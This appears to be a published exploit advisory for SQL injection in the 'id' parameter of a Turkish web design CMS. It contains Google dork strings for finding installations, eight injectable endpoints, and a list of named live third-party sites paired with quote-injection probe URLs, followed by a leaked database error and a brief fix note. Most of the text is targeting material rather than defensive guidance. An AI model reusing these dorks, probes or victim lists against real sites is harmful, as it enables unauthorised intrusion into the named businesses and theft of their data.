#################################################################################################

# Exploit Title : Siyah Beyaz Bilişim Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/12/2018
# Vendor Homepage : siyahbeyazbilisim.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# # Google Dorks :
intext:''TasarA+-m ve Kodlama Siyah Beyaz BiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''
intext:''TasarA+-m ve Kodlama SiyahBeyazBiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110203
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2261
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31533
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

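# SQL Injection Exploit : the "id" query parameter of the scripts below reaches the SQL query without neutralization (CWE-89)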

/yazi.php?id=[SQL Injection]

/resimler.php?id=[SQL Injection]

/sayfa.php?id=[SQL Injection]

/grup.php?id=[SQL Injection]

/haber.php?id=[SQL Injection]

/slider.php?id=[SQL Injection]

/sube.php?id=[SQL Injection]

/duyurular.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

[+] aydincdm.org/yazi.php?id=5%27 => [ Proof of Concept ] =>
archive.is/cABYo

[+] sevennakliyat.com/resimler.php?id=3%27

[+] tucanteknik.com/sayfa.php?id=110%27

[+] turenyapi.com/grup.php?id=16%27

[+] saranlar.com/sube.php?id=2%27

[+] semirauto.com/grup.php?id=1%27

[+] aydinkompresor.net/kurumsal.php?id=4%27

[+] simgepastacilik.com/grup.php?id=12%27

[+] kocarlitarispamuk.com/grup.php?id=4%27

[+] royalmarine.com.tr/grup.php?id=2%27

[+] didimsanatakademisi.com/album.php?id=12%27

[+] dundarlarparke.com/grup.php?id=6%27

[+] aykimsan.com.tr/grup.php?id=22%27

[+] lilacambalkon.com/resimler.php?id=7%27

[+] avrupakulturakademi.com/sayfa.php?id=1%27

[+] novasluxe.com/sayfa.php?id=21%27

[+] megafit.com.tr/resimler.php?id=3%27

[+] dogrugunespaneli.com/grup.php?id=6%27

#################################################################################################

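# Example SQL Database Error ( returned when a single quote, %27, is appended to the id value ) :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/adsyb/public_html/yazi.php on line 5

# Note : the warning shows that the failed query result is handed to mysql_fetch_array() unchecked, and it discloses the server file path.
# Fix : bind the id value through a prepared statement ( mysqli or PDO ) or cast it to an integer before use, and turn display_errors off in production.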

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################